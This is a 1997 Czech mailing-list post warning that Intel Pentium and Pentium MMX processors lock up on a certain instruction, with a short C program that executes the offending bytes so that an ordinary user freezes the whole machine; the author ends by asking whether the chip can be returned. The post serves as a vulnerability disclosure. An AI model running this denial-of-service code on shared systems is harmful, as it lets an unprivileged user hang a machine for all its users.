Pentium - co s nim ?

Petr Simek petrsi na jcu.cz
Pondělí Listopad 10 09:21:41 CET 1997

Mate Intel Pentium ? - Mate smulu !

Dnes jsem dostal informaci (z linux-security) ze v Pentiu (vcetne MMX)
je zavazna chyba - pokud procesor narazi na jistou instrukci - vytuhne !
Podotykam ze nezalezi na tom s jakymi pravy program obsahujici tuto
instrukci bezi !! Ohrozeny jsou vsechny multiuzivatelske systemy bezici na
pentiu . 486 a PentiaPRO se to netyka !

Staci spustit nasledujici program jako obycejny uzivatel a stroj zamrzne.

char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };

main ()
{
        void (*f)() = x;
        f();
}

Lze ten pitomy procesor nekde reklamovat ?